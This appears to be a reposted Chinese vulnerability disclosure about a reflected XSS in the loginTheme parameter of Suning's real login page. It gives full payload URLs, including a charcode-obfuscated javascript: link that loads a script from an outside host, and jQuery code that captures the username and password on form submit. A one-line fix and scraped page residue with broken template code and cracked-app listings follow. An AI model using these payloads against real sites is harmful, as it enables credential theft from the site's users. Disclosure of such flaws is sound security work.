苏宁易购某分站XSS漏洞可用于获取账号密码
苏宁易购登录页面存在反射型XSS漏洞,具体URL为:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c
虽然对loginTheme进行了一定的过滤,但是还是允许<a> <img>等html tag.
最简单的测试为:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test
可以看到会员登录框上出现一个image:
接下来就是如何构建注入代码加载JS文件,以及如何bypass浏览器的xss filter, 目前只是在FireFox上实现了加载JS,IE和chrome上还没有加载成功,相信各位大牛一定能找到方法。
加载的js的代码为:
$("form").submit(function( event ) {
alert($("input[name='username']").val() + '=' + $("input[name='password']").val());
});
FireFox上访问的URL构建为(javascript:eval + String.fromCharCode):
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Ca%20href%3D%22javascript%3Aeval%28String.fromCharCode%2895,108,111,97,100,74,115,40,34,104,116,116,112,115,58,47,47,111,119,97,102,112,101,46,115,105,110,97,97,112,112,46,99,111,109,47,115,116,97,116,105,99,47,116,101,115,116,46,106,115,34,41%29%29;%22%20id=%22a
这里是注入<a>, 用户点击输入输入框时会加载js,提交的时候就能拿到username和password了。
如何利用就不用我讲了吧。
修复方案:
过滤loginTheme参数
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;
![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)
